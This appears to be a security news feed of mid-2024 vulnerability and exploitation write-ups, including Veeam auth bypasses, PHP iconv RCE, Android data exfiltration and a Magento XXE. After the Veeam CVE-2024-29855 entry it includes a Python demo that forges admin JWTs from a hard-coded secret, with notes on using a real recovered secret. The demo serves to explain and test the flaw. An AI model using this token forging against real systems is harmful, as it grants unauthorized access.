Bypassing Veeam Authentication CVE-2024-29849 #VeeamAuthBypass #CVE202429849 #TeamTraining #Exploits #Advisories https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/
Summoning Team
An interesting authentication bypass exploit in Veeam Backup Enterprise Manager
Finding the slab cache for each object in Linux kernel using static analysis #LinuxKernel #StaticAnalysis #SlabCache #Clang #llvmorg13.0.1 https://albocoder.github.io/exploitation/linux%20kernel/2024/06/09/KernelStaticAnalysis.html
Erin Avllazagaj
The State of Go Fuzzing - Did we already reach the peak? #GoFuzzing #StateOfTheArt #NativeFuzzing #ToolingLandscape #FuzzingEcosystem https://0x434b.dev/the-state-of-go-fuzzing-did-we-already-reach-the-peak/
Low-level adventures
During one of the recent working days, I was tasked with fuzzing some Go applications. That's something I had not done in a while, so my first course of action was to research the current state of the art of the tooling landscape. After like a couple of hours…
Thecus NAS Firmware Decryption #FirmwareDecryption #ThecusNAS #DES-CBC #LegacyCiphers https://starkeblog.com/cryptography/firmware/2024/06/11/thecus-nas-firmware-decrypt.html
A Visual Guide to Pointer Analysis with cclyzer++: Part 1 #Galois #PointerAnalysis #cclyzer++ #VisualGuide #StaticAnalysis https://galois.com/blog/2022/08/cclyzer/
There are no Secrets || Exploiting Veeam CVE-2024-29855 #VeeamCVE #AuthenticationBypass #Exploits #TokenGeneration #TokenValidation https://summoning.team/blog/veeam-recovery-orchestrator-auth-bypass-cve-2024-29855/
Summoning Team
This vulnerability is due to the fact that the JWT secret used to generate authentication tokens was a hardcoded value, which means an unauthenticated attacker can generate valid tokens for any user (not just the administrator) and log in to the Veeam Recovery…
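The mechanism described above (a hard-coded HMAC secret lets anyone mint tokens the server accepts) as an added, self-contained example. This is not the Summoning Team's exploit and not Veeam code: DEMO_SECRET, the claim names and the role values are constructed placeholders, and the "server" is a minimal HS256 verifier written here for illustration. The last function is the check a tester actually wants: does a candidate secret validate a token captured from a live instance?

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Constructed demo secret (NOT the real Veeam value); stands in for any
# HS256 key that ships hard-coded in a product and is therefore public.
DEMO_SECRET = b"hardcoded-demo-secret"


def _b64url(data: bytes) -> str:
    """Base64url without padding, as JWT requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(s: str) -> bytes:
    """Inverse of _b64url; restores padding before decoding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def _sign(secret: bytes, signing_input: str) -> bytes:
    """HS256 = HMAC-SHA256 over 'base64url(header).base64url(payload)'."""
    return hmac.new(secret, signing_input.encode("ascii"), hashlib.sha256).digest()


def forge_token(secret: bytes, claims: dict) -> str:
    """Attacker side: mint an HS256 JWT for arbitrary claims with a known secret.

    Nothing here is specific to one user; whoever knows the secret can issue
    a token for any 'sub' and any 'role' the server trusts from the payload.
    """
    header = {"alg": "HS256", "typ": "JWT"}
    compact = {"separators": (",", ":")}
    signing_input = (
        _b64url(json.dumps(header, **compact).encode())
        + "."
        + _b64url(json.dumps(claims, **compact).encode())
    )
    return signing_input + "." + _b64url(_sign(secret, signing_input))


def signature_valid(secret: bytes, token: str) -> bool:
    """Constant-time HS256 signature check; rejects malformed tokens and other algs."""
    try:
        h, p, s = token.split(".")
        header = json.loads(_b64url_decode(h))
        provided = _b64url_decode(s)
    except ValueError:  # wrong segment count, bad base64, bad JSON
        return False
    if header.get("alg") != "HS256":
        return False
    return hmac.compare_digest(_sign(secret, h + "." + p), provided)


def verify_token(secret: bytes, token: str, now: Optional[int] = None) -> Optional[dict]:
    """Server side: return the claims if signature and expiry are valid, else None."""
    if not signature_valid(secret, token):
        return None
    claims = json.loads(_b64url_decode(token.split(".")[1]))
    now = int(time.time()) if now is None else now
    if "exp" in claims and claims["exp"] < now:
        return None
    return claims


def secret_is_hardcoded(captured_token: str, candidate_secret: bytes) -> bool:
    """Tester's check: a token captured from a real login that validates under a
    secret pulled out of the product's binaries confirms the secret is shared
    by every installation, i.e. the finding is real before any token is forged."""
    return signature_valid(candidate_secret, captured_token)


if __name__ == "__main__":
    # Constructed claim set; the role value is a placeholder, not Veeam's schema.
    forged = forge_token(DEMO_SECRET, {"sub": "anyone", "role": "Administrator", "exp": 4102444800})
    print("server accepts forged token:", verify_token(DEMO_SECRET, forged) is not None)
```

Usage: run the block once to see the verifier accept a token it never issued; to reproduce the check against a real target, replace DEMO_SECRET with the secret recovered from the product and `captured_token` with a token from a legitimate login, and confirm `secret_is_hardcoded` returns True before minting anything.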
Stepping Stones – A Red Team Activity Hub #RedTeam #CybersecurityResearch #RealWorldCryptography #VulnerabilityManagement #DigitalSecurity https://research.nccgroup.com/2024/06/12/stepping-stones-a-red-team-activity-hub/
Nccgroup
Iconv, set the charset to RCE: Exploiting the glibc to hack the PHP engine (part 2) #IconvExploit #GlibcHack #PHP #CharsetRCE #RoundcubeVulnerability https://www.ambionics.io/blog/iconv-cve-2024-2961-p2
Ambionics
In this blog post, we will explore a new way of exploiting the vulnerability on PHP, using direct calls to iconv(), and illustrate the vulnerability by targeting Roundcube, a popular PHP webmail.
Abusing noscript reporting and tmux integration in iTerm2 for code execution #iTerm2 #CodeExecution #SecurityVulnerability #TitleReportingAbuse #FixReleased https://vin01.github.io/piptagole/escape-sequences/iterm2/rce/2024/06/16/iterm2-rce-window-noscript-tmux-integration.html
Vin01’s Blog
Regression turned into RCE
Exfiltrate sensitive user data from apps on Android 12 and 13 using CVE-2024-0044 vulnerability #AndroidHacking #CVE20240044 #DataExfiltration #MobileHacker #Vulnerability https://www.mobile-hacker.com/2024/06/17/exfiltrate-sensitive-user-data-from-apps-on-android-12-and-13-using-cve-2024-0044-vulnerability/
Mobile Hacker
With physical access to an Android device that has ADB debugging enabled and is running Android 12 or 13 without the March 2024 security patch, it is possible to access the internal data of any user-installed app by abusing the CVE-2024-0044 vulnerability. Internal data…
Extending Burp Suite for fun and profit – The Montoya way – Part 5 #BurpSuite #ExtensionDevelopment #Security #MontoyaWay #Part5 https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-5/
HN Security
Setting up the environment + Hello World; Inspecting and tampering HTTP requests and responses; Inspecting and tampering WebSocket messages; Creating […]
Beyond the @ Symbol: Exploiting the Flexibility of Email Addresses For Offensive Purposes #EmailExploitation #MailCleanerVulnerabilities #OSCommandInjection #CrossSiteScripting #EmailSecurity https://modzero.com/en/blog/beyond_the_at_symbol/
Restructuring the Binary Ninja Decompiler #BinaryNinja #Decompiler #ControlFlow #Improvements #Readability https://binary.ninja/2024/06/19/restructuring-the-decompiler.html
Binary Ninja
Binary Ninja is a modern reverse engineering platform with a noscriptable and extensible decompiler.
Analysis of CVE-2024-25065: Apache OFBiz Security bypass #CVE-2024-25065 #ApacheOFBiz #SecurityBypass #UnauthorizedAccess #PenetrationTesting https://blog.securelayer7.net/security-bypass-in-apache-ofbiz/
SecureLayer7 - Offensive Security, API Scanner & Attack Surface Management
CVE-2024-25065 is a vulnerability that exists in Apache OFBiz before version 18.12.12. It is a path traversal vulnerability that allows authentication bypass through the contextPath...
Zip Slip meets Artifactory: A Bug Bounty Story #ZipSlip #Artifactory #BugBounty #SecurityVulnerability #RemoteCodeExecution https://karmainsecurity.com/zip-slip-meets-artifactory-a-bug-bounty-story
Karmainsecurity
This is the personal website of Egidio Romano, a very curious guy from Sicily, Italy. He's a computer security enthusiast, particularly addicted to webapp security.
Understanding Protected Management Frames (PMF) in Wi-Fi #PMF #ProtectedManagementFrames #WiFiSecurity #ManagementFrames #TheXero https://www.thexero.co.uk/blog/Understanding-PMF
Two bluetooth vulnerabilities in Windows #WindowsBluetoothVulnerabilities #CVE202324871 #CVE202323388 #RCE #LPE https://ynwarcs.github.io/z-btadv-cves
Reverse engineering eBPF programs #eBPF #ReverseEngineering #Security #Kubernetes #ARMOPlatform https://www.armosec.io/blog/ebpf-reverse-engineering-programs/
ARMO
Explore how eBPF technology works by reverse engineering eBPF-based programs. Learn about its internals, benefits, and applications in modern computing
New Diamorphine rootkit variant seen undetected in the wild #NewDiamorphine #RootkitVariant #UndetectedInTheWild #AvastThreatLabs #LinuxKernel https://decoded.avast.io/davidalvarez/new-diamorphine-rootkit-variant-seen-undetected-in-the-wild/
Gendigital
Advanced Features of New Diamorphine
Why nested deserialization is harmful: Magento XXE (CVE-2024-34102) #MagentoCVE #XXE #NestedDeserialization #SecurityResearch #BreakingNews https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102
www.assetnote.io
A critical, pre-authentication XML entity injection issue in Magento / Adobe Commerce (CVE-2024-34102), which Adobe rated as CVSS 9.8.